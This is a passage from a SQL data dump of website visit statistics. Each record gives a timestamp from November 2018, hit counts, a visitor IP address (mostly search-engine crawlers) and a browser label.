'54.36.148.105','other'),(337153,1542723724,1,1,0,0,'66.249.66.152','chrome'),(337154,1542723731,1,1,0,0,'91.196.178.88','chrome'),(337155,1542723764,1,1,0,0,'8.29.198.25','other'),(337156,1542724035,1,1,0,0,'54.36.148.44','other'),(337157,1542724156,2,2,0,0,'40.77.167.54','other'),(337158,1542724215,2,2,0,0,'194.44.47.165','firefox'),(337159,1542724310,1,1,0,0,'207.46.13.98','other'),(337160,1542724383,1,1,0,0,'8.29.198.26','other'),(337161,1542724390,1,1,0,0,'180.76.15.149','other'),(337162,1542724391,1,1,0,0,'180.76.15.8','other'),(337163,1542724466,1,1,0,0,'54.36.148.17','other'),(337164,1542724607,1,1,0,0,'54.36.148.97','other'),(337165,1542724804,2,2,0,0,'195.162.90.62','chrome'),(337166,1542724942,2,2,0,0,'91.250.59.156','chrome'),(337167,1542725049,2,2,0,0,'178.94.172.231','chrome'),(337168,1542725309,1,1,0,0,'54.36.148.84','other'),(337169,1542725334,1,1,0,0,'54.36.148.109','other'),(337170,1542725354,1,1,0,0,'195.225.147.207','chrome'),(337171,1542725392,2,2,0,0,'91.196.178.75','chrome'),(337172,1542725525,3,3,0,0,'91.196.178.88','chrome'),(337173,1542725611,1,1,0,0,'31.13.127.4','other'),(337174,1542725612,1,1,0,0,'31.13.127.11','other'),(337175,1542725617,1,1,0,0,'31.13.127.7','other'),(337176,1542725785,1,1,0,0,'54.36.148.214','other'),(337177,1542725840,1,1,0,0,'94.179.147.128','chrome'),(337178,1542725843,1,1,0,0,'157.55.39.168','other'),(337179,1542725883,1,1,0,0,'46.201.125.163','chrome'),(337180,1542725959,2,2,0,0,'207.46.13.98','other'),(337181,1542726086,1,1,0,0,'54.36.148.49','other'),(337182,1542726617,1,1,0,0,'40.77.167.54','other'),(337183,1542726777,1,1,0,0,'46.229.168.142','other'),(337184,1542726779,1,1,0,0,'46.229.168.146','other'),(337185,1542726950,1,1,0,0,'54.36.149.12','other'),(337186,1542727000,1,1,0,0,'188.165.255.126','other'),(337187,1542727366,1,1,0,0,'91.196.178.75','chrome'),(337188,1542727371,1,1,0,0,'66.249.66.155','chrome'),(337189,1542727372,1,1,0,0,'66.249.66.152','chrome'),(337190,1542727486,1,1,0,0,'54.36.148.153','other'),(337191,1542727598,1,1,0,0,'54.36.148.113','other'),(337192,1542727798,1,1,0,0,'178.154.244.29','other'),(337193,1542727808,1,1,0,0,'95.163.255.93','other'),(337194,1542727814,1,1,0,0,'95.163.255.98','other'),(337195,1542727821,1,1,0,0,'87.250.224.47','other'),(337196,1542727903,1,1,0,0,'54.36.149.11','other'),(337197,1542727939,1,1,0,0,'54.36.148.149','other'),(337198,1542727967,1,1,0,0,'54.36.148.57','other'),(337199,1542728022,1,1,0,0,'54.36.148.101','other'),(337200,1542728197,1,1,0,0,'54.36.148.158','other'),(337201,1542728280,1,1,0,0,'46.229.168.150','other'),(337202,1542728284,1,1,0,0,'46.229.168.139','other'),(337203,1542728286,1,1,0,0,'46.229.168.152','other'),(337204,1542728418,4,4,0,0,'91.196.178.89','chrome'),(337205,1542728746,1,1,0,0,'46.229.168.153','other'),(337206,1542728748,1,1,0,0,'46.229.168.132','other'),(337207,1542728762,1,1,0,0,'54.36.148.26','other'),(337208,1542729174,1,1,0,0,'207.46.13.172','other'),(337209,1542729295,1,1,0,0,'54.36.148.101','other'),(337210,1542729456,1,1,0,0,'54.36.148.142','other'),(337211,1542729484,1,1,0,0,'157.55.39.168','other'),(337212,1542729548,1,1,0,0,'54.36.148.221','other'),(337213,1542729613,1,1,0,0,'178.154.244.29','other'),(337214,1542729757,1,1,0,0,'207.46.13.98','other'),(337215,1542729891,1,1,0,0,'46.229.168.140','other'),(337216,1542729926,1,1,0,0,'54.36.148.166','other'),(337217,1542729964,1,1,0,0,'54.36.148.90','other'),(337218,1542730379,2,2,0,0,'91.196.178.163','chrome'),(337219,1542730712,1,1,0,0,'95.163.255.97','other'),(337220,1542730717,1,1,0,0,'95.163.255.94','other'),(337221,1542730904,2,2,0,0,'46.211.10.221','chrome'),(337222,1542731035,1,1,0,0,'40.77.167.54','other'),(337223,1542731084,1,1,0,0,'37.187.134.60','other'),(337224,1542731219,1,1,0,0,'54.36.148.215','other'),(337225,1542731590,1,1,0,0,'54.36.148.17','other'),(337226,1542731663,1,1,0,0,'178.137.158.85','chrome'),(337227,1542731923,1,1,0,0,'46.229.168.144','other'),(337228,1542731926,1,1,0,0,'46.229.168.152','other'),(337229,1542731988,1,1,0,0,'54.36.148.104','other'),(337230,1542732007,1,1,0,0,'54.36.148.39','other'),(337231,1542732123,1,1,0,0,'93.78.232.42','chrome'),(337232,1542732243,1,1,0,0,'46.229.168.146','other'),(337233,1542732370,1,1,0,0,'54.36.148.113','other'),(337234,1542732407,1,1,0,0,'40.77.167.54','other'),(337235,1542732453,1,1,0,0,'66.249.66.156','chrome'),(337236,1542732492,1,1,0,0,'5.58.53.78','msie'),(337237,1542732670,1,1,0,0,'54.36.148.106','other'),(337238,1542732778,1,1,0,0,'66.249.66.154','chrome'),(337239,1542732923,1,1,0,0,'54.36.148.85','other'),(337240,1542732967,1,1,0,0,'54.36.148.91','other'),(337241,1542732974,1,1,0,0,'8.29.198.27','other'),(337242,1542733227,1,1,0,0,'54.36.148.70','other'),(337243,1542733399,1,1,0,0,'66.249.66.156','chrome'),(337244,1542733429,1,1,0,0,'54.36.148.31','other'),(337245,1542733450,2,2,0,0,'91.196.178.129','firefox'),(337246,1542733451,1,1,0,0,'54.36.148.58','other'),(337247,1542733822,1,1,0,0,'54.36.149.92','other'),(337248,1542733903,2,2,0,0,'91.196.178.78','firefox'),(337249,1542733935,1,1,0,0,'46.229.168.153','other'),(337250,1542733951,1,1,0,0,'54.36.149.63','other'),(337251,1542733993,1,1,0,0,'207.46.13.172','other'),(337252,1542734085,1,1,0,0,'157.55.39.168','other'),(337253,1542734136,4,4,0,0,'95.134.184.13','chrome'),(337254,1542734137,1,1,0,0,'46.229.168.146','other'),(337255,1542734539,1,1,0,0,'54.36.149.7','other'),(337256,1542734563,1,1,0,0,'176.120.100.209','firefox'),(337257,1542734627,2,2,0,0,'8.29.198.25','other'),(337258,1542734629,1,1,0,0,'54.36.148.189','other'),(337259,1542734655,1,1,0,0,'212.2.129.61','other'),(337260,1542734939,1,1,0,0,'54.36.148.104','other'),(337261,1542734974,1,1,0,0,'66.249.66.154','chrome'),(337262,1542734982,1,1,0,0,'54.36.149.34','other'),(337263,1542735018,1,1,0,0,'54.36.148.31','other'),(337264,1542735198,1,1,0,0,'54.36.148.213','other'),(337265,1542735215,1,1,0,0,'54.36.148.192','other'),(337266,1542735382,1,1,0,0,'213.180.203.23','other'),(337267,1542735568,1,1,0,0,'54.36.149.37','other'),(337268,1542735600,1,1,0,0,'54.36.148.173','other'),(337269,1542735697,1,1,0,0,'66.249.66.152','chrome'),(337270,1542735901,1,1,0,0,'54.36.148.164','other'),(337271,1542736114,1,1,0,0,'54.36.148.204','other'),(337272,1542736190,2,2,0,0,'54.36.148.227','other'),(337273,1542736224,1,1,0,0,'207.46.13.172','other'),(337274,1542736274,1,1,0,0,'100.26.189.248','firefox'),(337275,1542736592,1,1,0,0,'54.36.149.41','other'),(337276,1542736670,1,1,0,0,'54.36.148.63','other'),(337277,1542736729,2,2,0,0,'207.46.13.98','other'),(337278,1542736815,1,1,0,0,'54.36.148.249','other'),(337279,1542737478,1,1,0,0,'54.36.148.54','other'),(337280,1542737492,1,1,0,0,'46.229.168.154','other'),(337281,1542737495,1,1,0,0,'46.229.168.151','other'),(337282,1542737844,1,1,0,0,'54.36.148.217','other'),(337283,1542738354,2,2,0,0,'207.46.13.172','other'),(337284,1542738358,1,1,0,0,'40.77.167.54','other'),(337285,1542738511,1,1,0,0,'54.36.148.141','other'),(337286,1542738630,1,1,0,0,'54.36.148.97','other'),(337287,1542738646,1,1,0,0,'54.36.148.151','other'),(337288,1542738839,1,1,0,0,'54.36.148.204','other'),(337289,1542738891,2,2,0,0,'46.229.168.153','other'),(337290,1542738945,1,1,0,0,'46.229.168.143','other'),(337291,1542739002,1,1,0,0,'207.46.13.98','other'),(337292,1542739089,1,1,0,0,'54.36.149.40','other'),(337293,1542739415,1,1,0,0,'54.36.148.11','other'),(337294,1542739427,1,1,0,0,'46.229.168.136','other'),(337295,1542739445,1,1,0,0,'46.211.52.114','chrome'),(337296,1542739568,1,1,0,0,'207.46.13.172','other'),(337297,1542739604,1,1,0,0,'40.77.167.54','other'),(337298,1542739748,1,1,0,0,'5.58.157.164','opera'),(337299,1542739919,2,2,0,0,'91.124.119.243','chrome'),(337300,1542740202,1,1,0,0,'207.46.13.98','other'),(337301,1542740235,6,6,0,0,'78.30.221.72','chrome'),(337302,1542740253,1,1,0,0,'66.249.66.152','chrome'),(337303,1542740265,1,1,0,0,'54.36.148.46','other'),(337304,1542740771,1,1,0,0,'54.36.148.247','other'),(337305,1542740854,1,1,0,0,'66.249.81.195','chrome'),(337306,1542740864,1,1,0,0,'46.211.53.157','chrome'),(337307,1542740878,2,2,0,0,'66.249.66.156','chrome'),(337308,1542741038,1,1,0,0,'66.249.66.157','chrome'),(337309,1542741106,1,1,0,0,'54.36.149.43','other'),(337311,1542741230,1,1,0,0,'54.36.148.67','other'),(337312,1542741380,1,1,0,0,'54.36.149.6','other'),(337313,1542742228,1,1,0,0,'54.36.149.94','other'),(337314,1542742358,1,1,0,0,'66.249.66.44','chrome'),(337315,1542742704,1,1,0,0,'46.229.168.133','other'),(337316,1542742803,1,1,0,0,'213.174.6.43','chrome'),(337317,1542742821,2,2,0,0,'54.36.148.90','other'),(337318,1542742978,1,1,0,0,'66.249.66.154','chrome'),(337319,1542743059,1,1,0,0,'46.229.168.150','other'),(337320,1542743062,1,1,0,0,'46.229.168.153','other'),(337321,1542743137,1,1,0,0,'54.36.148.173','other'),(337322,1542743240,1,1,0,0,'54.36.148.168','other'),(337323,1542743483,1,1,0,0,'54.36.148.163','other'),(337324,1542743538,1,1,0,0,'54.36.148.22','other'),(337325,1542743751,1,1,0,0,'54.36.148.40','other'),(337326,1542743756,1,1,0,0,'46.229.168.149','other'),(337327,1542743812,1,1,0,0,'8.29.198.27','other'),(337328,1542743913,1,1,0,0,'213.174.6.43','chrome'),(337329,1542743990,2,2,0,0,'157.55.39.168','other'),(337330,1542744167,1,1,0,0,'46.229.168.143','other'),(337331,1542744173,1,1,0,0,'46.229.168.140','other'),(337332,1542744565,1,1,0,0,'54.36.148.131','other'),(337333,1542744693,1,1,0,0,'54.36.149.107','other'),(337334,1542744948,1,1,0,0,'54.36.148.22','other'),(337335,1542744952,1,1,0,0,'54.36.149.23','other'),(337336,1542745264,1,1,0,0,'178.136.240.145','chrome'),(337337,1542745378,1,1,0,0,'54.36.148.147','other'),(337338,1542745488,2,2,0,0,'8.29.198.27','other'),(337339,1542746465,1,1,0,0,'54.36.148.68','other'),(337340,1542746484,1,1,0,0,'54.36.149.5','other'),(337341,1542746655,1,1,0,0,'46.229.168.147','other'),(337342,1542746992,1,1,0,0,'54.36.148.237','other'),(337343,1542747058,1,1,0,0,'66.249.66.156','chrome'),(337344,1542747076,1,1,0,0,'54.36.148.108','other'),(337345,1542747084,1,1,0,0,'54.36.148.18','other'),(337346,1542747214,1,1,0,0,'178.136.240.145','chrome'),(337347,1542747494,1,1,0,0,'54.36.148.100','other'),(337348,1542747691,1,1,0,0,'54.36.149.74','other'),(337349,1542747702,1,1,0,0,'95.108.213.50','other'),(337350,1542747886,3,3,0,0,'95.108.181.83','other'),(337351,1542747890,1,1,0,0,'141.8.142.81','other'),(337352,1542747894,1,1,0,0,'37.9.113.38','other'),(337353,1542747944,1,1,0,0,'141.8.142.162','other'),(337354,1542747984,1,1,0,0,'54.36.149.58','other'),(337355,1542748083,2,2,0,0,'5.255.253.25','other'),(337356,1542748109,4,4,0,0,'178.154.244.11','other'),(337357,1542748142,1,1,0,0,'5.45.207.76','other'),(337358,1542748146,1,1,0,0,'213.180.203.48','other'),(337359,1542748165,1,1,0,0,'95.108.181.94','other'),(337360,1542748216,1,1,0,0,'46.229.168.139','other'),(337361,1542748301,1,1,0,0,'54.36.148.196','other'),(337362,1542748355,1,1,0,0,'213.180.203.61','other'),(337363,1542748415,1,1,0,0,'5.45.207.19','other'),(337364,1542748459,2,2,0,0,'157.55.39.252','other'),(337365,1542748488,1,1,0,0,'95.108.213.4','other'),(337366,1542748494,1,1,0,0,'37.9.113.148','other'),(337367,1542748542,1,1,0,0,'87.250.224.107','other'),(337368,1542748546,1,1,0,0,'213.180.203.23','other'),(337369,1542748547,1,1,0,0,'95.108.181.75','other'),(337370,1542748628,1,1,0,0,'213.180.203.53','other'),(337371,1542748685,1,1,0,0,'87.250.224.47','other'),(337372,1542748729,1,1,0,0,'141.8.183.22','other'),(337373,1542748730,1,1,0,0,'37.9.113.103','other'),(337374,1542748823,6,6,0,0,'178.154.244.29','other'),(337375,1542748946,1,1,0,0,'54.36.148.140','other'),(337376,1542749042,1,1,0,0,'46.229.168.145','other'),(337377,1542749129,5,5,0,0,'178.154.244.11','other'),(337378,1542749282,1,1,0,0,'54.36.149.59','other'),(337379,1542749321,1,1,0,0,'54.36.148.22','other'),(337380,1542749468,1,1,0,0,'66.249.66.157','chrome'),(337381,1542749469,1,1,0,0,'66.249.66.152','chrome'),(337382,1542749827,1,1,0,0,'54.36.149.16','other'),(337383,1542749882,1,1,0,0,'54.36.149.7','other'),(337384,1542749986,1,1,0,0,'54.36.148.55','other'),(337385,1542750140,1,1,0,0,'37.9.113.103','other'),(337386,1542750160,1,1,0,0,'5.45.207.79','other'),(337387,1542750188,1,1,0,0,'178.154.244.11','other'),(337388,1542750226,1,1,0,0,'54.36.148.46','other'),(337389,1542750234,1,1,0,0,'207.46.13.72','other'),(337390,1542750416,1,1,0,0,'54.36.148.77','other'),(337391,1542750464,1,1,0,0,'185.160.62.210','msie'),(337392,1542750510,1,1,0,0,'178.154.244.29','other'),(337393,1542751181,2,2,0,0,'95.163.255.92','other'),(337394,1542751479,1,1,0,0,'54.36.148.194','other'),(337395,1542752301,1,1,0,0,'54.36.149.44','other'),(337396,1542752347,1,1,0,0,'54.36.148.155','other'),(337397,1542752470,1,1,0,0,'54.36.148.31','other'),(337398,1542752537,1,1,0,0,'54.36.149.87','other'),(337399,1542752810,1,1,0,0,'46.229.168.144','other'),(337400,1542753256,1,1,0,0,'207.46.13.172','other'),(337401,1542753355,1,1,0,0,'54.36.149.67','other'),(337402,1542753546,1,1,0,0,'54.36.148.197','other'),(337403,1542753720,1,1,0,0,'5.58.54.239','opera'),(337404,1542753817,1,1,0,0,'54.36.148.90','other'),(337405,1542753867,1,1,0,0,'46.229.168.139','other'),(337406,1542753870,1,1,0,0,'46.229.168.153','other'),(337407,1542754400,1,1,0,0,'31.148.135.243','firefox'),(337408,1542754660,1,1,0,0,'8.29.198.27','other'),(337409,1542754774,1,1,0,0,'54.36.148.59','other'),(337410,1542755071,1,1,0,0,'178.154.244.11','other'),(337411,1542755312,2,2,0,0,'95.213.141.126','opera'),(337412,1542755338,1,1,0,0,'54.36.148.80','other'),(337413,1542755428,1,1,0,0,'54.36.148.43','other'),(337414,1542755541,130,130,0,0,'159.69.37.244','other'),(337415,1542755565,1,1,0,0,'66.249.66.157','chrome'),(337416,1542755566,1,1,0,0,'66.249.66.156','chrome'),(337417,1542755909,1,1,0,0,'66.249.66.61','chrome'),(337418,1542755910,1,1,0,0,'66.249.66.42','chrome'),(337419,1542756335,1,1,0,0,'8.29.198.27','other'),(337420,1542756601,1,1,0,0,'54.36.148.192','other'),(337421,1542756719,1,1,0,0,'54.36.148.38','other'),(337422,1542756819,1,1,0,0,'54.36.148.101','other'),(337423,1542756824,1,1,0,0,'95.163.255.98','other'),(337424,1542756840,1,1,0,0,'95.163.255.99','other'),(337425,1542756846,1,1,0,0,'54.36.148.223','other'),(337426,1542756885,1,1,0,0,'66.249.66.152','chrome'),(337427,1542756902,1,1,0,0,'54.36.148.119','other'),(337428,1542756915,1,1,0,0,'8.29.198.25','other'),(337429,1542756920,1,1,0,0,'46.229.168.141','other'),(337430,1542756947,1,1,0,0,'66.249.66.154','chrome'),(337431,1542756949,2,2,0,0,'162.210.196.98','other'),(337432,1542757125,1,1,0,0,'46.229.168.151','other'),(337433,1542757145,4,4,0,0,'159.69.37.244','other'),(337434,1542757489,1,1,0,0,'213.180.203.40','other'),(337435,1542757550,1,1,0,0,'54.36.148.206','other'),(337436,1542757842,1,1,0,0,'66.249.66.157','chrome'),(337437,1542757917,1,1,0,0,'54.36.148.233','other'),(337438,1542757928,1,1,0,0,'54.36.148.99','other'),(337439,1542758003,1,1,0,0,'66.249.66.155','chrome'),(337440,1542758004,2,2,0,0,'66.249.66.156','chrome'),(337441,1542758158,1,1,0,0,'54.36.148.215','other'),(337442,1542758195,2,2,0,0,'54.36.149.54','other'),(337443,1542758203,1,1,0,0,'176.31.208.193','other'),(337444,1542758400,1,1,0,0,'66.249.66.61','chrome'),(337445,1542758402,1,1,0,0,'66.249.66.44','chrome'),(337446,1542758778,1,1,0,0,'46.229.168.129','other'),(337447,1542758780,1,1,0,0,'46.229.168.152','other'),(337448,1542758899,1,1,0,0,'54.36.148.30','other'),(337449,1542759379,1,1,0,0,'54.36.148.108','other'),(337450,1542759712,1,1,0,0,'54.36.148.140','other'),(337451,1542760062,1,1,0,0,'54.36.148.144','other'),(337452,1542760080,24,24,0,0,'136.243.16.11','other'),(337453,1542760416,1,1,0,0,'66.249.66.156','chrome'),(337454,1542760498,1,1,0,0,'54.36.148.143','other'),(337455,1542760508,2,2,0,0,'66.249.66.152','chrome'),(337456,1542760630,1,1,0,0,'66.249.66.157','chrome'),(337457,1542760716,1,1,0,0,'54.36.148.244','other'),(337458,1542760783,1,1,0,0,'54.36.149.90','other'),(337459,1542760855,1,1,0,0,'54.36.148.181','other'),(337460,1542761034,1,1,0,0,'54.36.148.98','other'),(337461,1542761480,1,1,0,0,'54.36.148.52','other'),(337462,1542761495,1,1,0,0,'46.229.168.145','other'),(337463,1542762381,1,1,0,0,'46.229.168.140','other'),(337464,1542762386,1,1,0,0,'46.229.168.148','other'),(337465,1542762482,1,1,0,0,'178.137.158.85','chrome'),(337466,1542763251,1,1,0,0,'207.46.13.172','other'),(337467,1542763314,1,1,0,0,'54.36.148.149','other'),(337468,1542763329,1,1,0,0,'54.36.149.57','other'),(337469,1542763364,1,1,0,0,'54.36.149.81','other'),(337470,1542763484,1,1,0,0,'46.229.168.150','other'),(337471,1542763487,1,1,0,0,'46.229.168.136','other'),(337472,1542763941,1,1,0,0,'54.36.148.38','other'),(337473,1542764013,1,1,0,0,'66.249.66.155','chrome'),(337474,1542764038,2,2,0,0,'66.249.66.152','chrome'),(337475,1542764257,1,1,0,0,'54.36.149.72','other'),(337476,1542764603,1,1,0,0,'46.229.168.153','other'),(337477,1542764624,1,1,0,0,'46.229.168.140','other'),(337478,1542764848,1,1,0,0,'66.249.66.156','chrome'),(337479,1542764860,1,1,0,0,'66.249.66.154','chrome'),(337480,1542765303,1,1,0,0,'46.229.168.143','other'),(337481,1542765305,1,1,0,0,'46.229.168.129','other'),(337482,1542765356,1,1,0,0,'207.46.13.172','other'),(337483,1542765387,1,1,0,0,'54.36.148.159','other'),(337484,1542765497,1,1,0,0,'8.29.198.27','other'),(337485,1542765660,1,1,0,0,'40.77.167.85','other'),(337486,1542765875,1,1,0,0,'54.36.148.50','other'),(337487,1542765966,1,1,0,0,'54.36.148.137','other'),(337488,1542766667,1,1,0,0,'54.36.148.214','other'),(337489,1542766787,1,1,0,0,'54.36.149.11','other'),(337490,1542767089,2,2,0,0,'40.77.167.54','other'),(337491,1542767136,1,1,0,0,'54.36.148.42','other'),(337492,1542767170,1,1,0,0,'8.29.198.26','other'),(337493,1542767226,1,1,0,0,'54.36.148.113','other'),(337494,1542767300,1,1,0,0,'46.229.168.139','other'),(337495,1542767304,1,1,0,0,'46.229.168.137','other'),(337496,1542767334,1,1,0,0,'54.36.148.152','other'),(337497,1542767520,1,1,0,0,'54.36.148.102','other'),(337498,1542767757,1,1,0,0,'8.29.198.25','other'),(337499,1542767830,1,1,0,0,'54.36.148.202','other'),(337500,1542767890,1,1,0,0,'54.36.149.89','other'),(337501,1542768024,1,1,0,0,'54.36.149.30','other'),(337502,1542768329,1,1,0,0,'54.36.149.70','other'),(337503,1542768344,1,1,0,0,'54.36.148.115','other'),(337504,1542768377,1,1,0,0,'94.45.91.185','chrome'),(337505,1542768545,1,1,0,0,'54.36.148.199','other'),(337506,1542768689,2,2,0,0,'66.249.66.44','chrome'),(337507,1542768705,1,1,0,0,'66.249.66.57','chrome'),(337508,1542768708,1,1,0,0,'66.249.66.42','chrome'),(337509,1542768757,1,1,0,0,'40.77.167.54','other'),(337510,1542768809,1,1,0,0,'54.36.149.93','other'),(337511,1542768887,1,1,0,0,'46.229.168.136','other'),(337512,1542768889,1,1,0,0,'46.229.168.129','other'),(337513,1542768966,1,1,0,0,'54.36.148.135','other'),(337514,1542769228,1,1,0,0,'66.249.66.157','chrome'),(337515,1542769229,1,1,0,0,'66.249.66.152','chrome'),(337516,1542769406,2,2,0,0,'141.8.183.22','other'),(337517,1542769432,2,2,0,0,'5.45.207.19','other'),(337518,1542769501,2,2,0,0,'87.250.224.107','other'),(337519,1542769538,2,2,0,0,'95.108.181.57','other'),(337520,1542769545,2,2,0,0,'37.9.113.148','other'),(337521,1542769600,1,1,0,0,'54.36.149.10','other'),(337522,1542769637,1,1,0,0,'54.36.149.64','other'),(337523,1542769638,1,1,0,0,'54.36.148.171','other'),(337524,1542769740,1,1,0,0,'54.36.149.71','other'),(337525,1542769826,1,1,0,0,'40.77.167.54','other'),(337526,1542769831,1,1,0,0,'213.180.203.61','other'),(337527,1542769856,1,1,0,0,'178.154.171.60','other'),(337528,1542769880,1,1,0,0,'54.36.149.101','other'),(337529,1542769972,4,4,0,0,'178.154.244.11','other'),(337530,1542769988,1,1,0,0,'54.36.149.39','other'),(337531,1542769999,10,10,0,0,'178.154.244.29','other'),(337532,1542770051,1,1,0,0,'5.45.207.79','other'),(337533,1542770074,1,1,0,0,'54.36.148.42','other'),(337534,1542770359,1,1,0,0,'157.55.39.252','other'),(337535,1542770472,1,1,0,0,'54.36.148.72','other'),(337536,1542770550,1,1,0,0,'54.36.148.221','other'),(337537,1542770604,1,1,0,0,'54.36.148.219','other'),(337538,1542770675,2,2,0,0,'46.229.168.136','other'),(337539,1542770678,2,2,0,0,'46.229.168.143','other'),(337540,1542770708,1,1,0,0,'95.108.213.4','other'),(337541,1542770886,1,1,0,0,'66.249.66.155','chrome'),(337543,1542770918,7,7,0,0,'178.154.244.29','other'),(337544,1542770967,1,1,0,0,'66.249.66.154','chrome'),(337545,1542770970,1,1,0,0,'5.45.207.79','other'),(337546,1542770998,1,1,0,0,'54.36.148.182','other'),(337547,1542771049,1,1,0,0,'46.229.168.153','other'),(337548,1542771109,1,1,0,0,'5.45.207.19','other'),(337549,1542771111,1,1,0,0,'141.8.142.103','other'),(337550,1542771123,9,9,0,0,'178.154.244.11','other'),(337551,1542771164,1,1,0,0,'54.36.148.206','other'),(337552,1542771168,1,1,0,0,'87.250.224.47','other'),(337553,1542771396,1,1,0,0,'54.36.148.161','other'),(337554,1542771747,1,1,0,0,'54.36.148.139','other'),(337556,1542771789,1,1,0,0,'5.9.70.113','other'),(337557,1542771924,1,1,0,0,'54.36.148.244','other'),(337558,1542771927,1,1,0,0,'46.229.168.152','other'),(337559,1542771929,1,1,0,0,'46.229.168.147','other'),(337560,1542771972,2,2,0,0,'5.45.207.79','other'),(337561,1542771975,2,2,0,0,'178.154.244.29','other'),(337562,1542772093,1,1,0,0,'157.55.39.252','other'),(337563,1542772155,1,1,0,0,'40.77.167.85','other'),(337564,1542772175,1,1,0,0,'54.36.149.40','other'),(337565,1542772544,1,1,0,0,'54.36.148.67','other'),(337566,1542772709,1,1,0,0,'178.154.244.11','other'),(337567,1542772852,1,1,0,0,'54.36.148.127','other'),(337568,1542773132,1,1,0,0,'54.36.148.84','other'),(337569,1542773674,1,1,0,0,'54.36.149.57','other'),(337570,1542773678,1,1,0,0,'54.36.148.234','other'),(337571,1542773838,1,1,0,0,'54.36.148.154','other'),(337572,1542773848,1,1,0,0,'54.36.149.54','other'),(337573,1542773898,1,1,0,0,'46.229.168.149','other'),(337574,1542774191,1,1,0,0,'66.249.66.57','chrome'),(337575,1542774192,1,1,0,0,'66.249.66.44','chrome'),(337576,1542774202,2,2,0,0,'66.249.66.156','chrome'),(337577,1542774254,1,1,0,0,'141.8.142.162','other'),(337578,1542774310,1,1,0,0,'54.36.148.44','other'),(337579,1542774336,1,1,0,0,'54.36.148.162','other'),(337580,1542774719,1,1,0,0,'54.36.149.47','other'),(337581,1542774940,1,1,0,0,'178.154.244.11','other'),(337582,1542775045,1,1,0,0,'66.249.66.155','chrome'),(337583,1542775103,1,1,0,0,'54.36.148.81','other'),(337584,1542775244,1,1,0,0,'54.36.149.98','other'),(337585,1542775264,1,1,0,0,'54.36.148.61','other'),(337586,1542775310,1,1,0,0,'54.36.148.247','other'),(337587,1542775335,1,1,0,0,'54.36.149.31','other'),(337588,1542775870,1,1,0,0,'54.36.149.30','other'),(337589,1542776113,1,1,0,0,'54.36.148.184','other'),(337590,1542776194,1,1,0,0,'66.249.66.155','chrome'),(337591,1542776195,1,1,0,0,'66.249.66.154','chrome'),(337592,1542776254,1,1,0,0,'46.229.168.151','other'),(337593,1542776331,1,1,0,0,'8.29.198.26','other'),(337594,1542776649,1,1,0,0,'54.36.149.97','other'),(337595,1542777020,1,1,0,0,'40.77.167.85','other'),(337596,1542778008,2,2,0,0,'8.29.198.26','other'),(337597,1542778192,1,1,0,0,'54.36.148.187','other'),(337598,1542778200,1,1,0,0,'54.36.148.142','other'),(337599,1542778223,1,1,0,0,'46.229.168.130','other'),(337600,1542778383,1,1,0,0,'54.36.149.86','other'),(337601,1542778422,1,1,0,0,'66.249.66.154','chrome'),(337602,1542778902,1,1,0,0,'54.36.148.92','other'),(337603,1542778955,1,1,0,0,'46.229.168.152','other'),(337604,1542779001,1,1,0,0,'54.36.148.132','other'),(337605,1542779053,1,1,0,0,'46.229.168.147','other'),(337606,1542779136,1,1,0,0,'54.36.149.78','other'),(337607,1542779224,1,1,0,0,'54.36.148.238','other'),(337608,1542779825,1,1,0,0,'54.36.148.247','other'),(337609,1542779958,1,1,0,0,'54.36.148.180','other'),(337610,1542780023,1,1,0,0,'54.36.149.73','other'),(337611,1542780069,1,1,0,0,'54.36.148.170','other'),(337612,1542780215,1,1,0,0,'46.229.168.148','other'),(337613,1542780217,1,1,0,0,'46.229.168.152','other'),(337614,1542780242,2,1,1,0,'66.249.66.156',''),(337616,1542780358,1,0,1,0,'66.249.66.152',''),(337617,1542780368,1,1,0,0,'46.229.168.150','other'),(337618,1542780370,1,1,0,0,'46.229.168.136','other'),(337619,1542780401,1,1,0,0,'40.77.167.85','other'),(337620,1542780727,1,1,0,0,'54.36.149.44','other'),(337621,1542780765,1,1,0,0,'54.36.148.209','other'),(337622,1542781145,1,1,0,0,'54.36.148.242','other'),(337623,1542781241,1,1,0,0,'54.36.148.250','other'),(337624,1542781407,1,1,0,0,'40.77.167.189','other'),(337625,1542781454,1,1,0,0,'40.77.167.85','other'),(337626,1542781536,1,1,0,0,'54.36.148.80','other'),(337627,1542781585,1,1,0,0,'178.95.246.220','chrome'),(337628,1542781645,1,1,0,0,'66.249.66.155','chrome'),(337629,1542781646,1,1,0,0,'66.249.66.154','chrome'),(337630,1542781702,1,1,0,0,'54.36.149.60','other'),(337631,1542781753,1,1,0,0,'54.36.148.118','other'),(337632,1542782103,1,1,0,0,'54.36.148.89','other'),(337633,1542782109,1,1,0,0,'46.229.168.135','other'),(337634,1542782135,1,1,0,0,'178.154.244.11','other'),(337635,1542782501,1,1,0,0,'91.196.178.93','chrome'),(337636,1542782744,1,1,0,0,'46.229.168.142','other'),(337637,1542782841,1,1,0,0,'54.36.148.11','other'),(337638,1542783788,1,1,0,0,'54.36.148.242','other'),(337639,1542783920,2,2,0,0,'37.204.201.64','chrome'),(337640,1542784036,1,1,0,0,'54.36.149.50','other'),(337641,1542784098,1,1,0,0,'54.36.148.174','other'),(337642,1542784198,1,1,0,0,'66.249.66.57','chrome'),(337644,1542784361,1,1,0,0,'195.114.136.226','firefox'),(337645,1542784572,4,4,0,0,'91.196.178.169','chrome'),(337646,1542784707,1,1,0,0,'54.36.149.83','other'),(337647,1542784728,1,1,0,0,'54.36.148.118','other'),(337648,1542784824,1,1,0,0,'40.77.167.189','other'),(337649,1542785225,1,1,0,0,'66.249.66.157','chrome'),(337650,1542785226,1,1,0,0,'66.249.66.154','chrome'),(337651,1542785239,1,1,0,0,'54.36.148.188','other'),(337652,1542785327,2,2,0,0,'91.196.178.68','firefox'),(337653,1542785345,1,1,0,0,'46.229.168.141','other'),(337654,1542785510,1,1,0,0,'54.36.148.92','other'),(337655,1542785603,1,1,0,0,'54.36.149.18','other'),(337656,1542785621,1,1,0,0,'66.249.66.155','chrome'),(337657,1542785622,1,1,0,0,'66.249.66.156','chrome'),(337658,1542785665,1,1,0,0,'54.36.148.190','other'),(337659,1542785972,1,0,1,0,'66.249.66.152',''),(337660,1542785980,1,1,0,0,'95.163.255.92','other'),(337661,1542785982,1,1,0,0,'95.163.255.93','other'),(337662,1542786030,1,0,1,0,'66.249.66.42',''),(337663,1542786140,1,1,0,0,'176.105.216.228','chrome'),(337664,1542786271,2,2,0,0,'91.196.178.93','chrome'),(337665,1542786323,1,1,0,0,'66.249.66.152','chrome'),(337666,1542786368,1,1,0,0,'54.36.148.207','other'),(337667,1542786622,1,1,0,0,'66.249.66.44','chrome'),(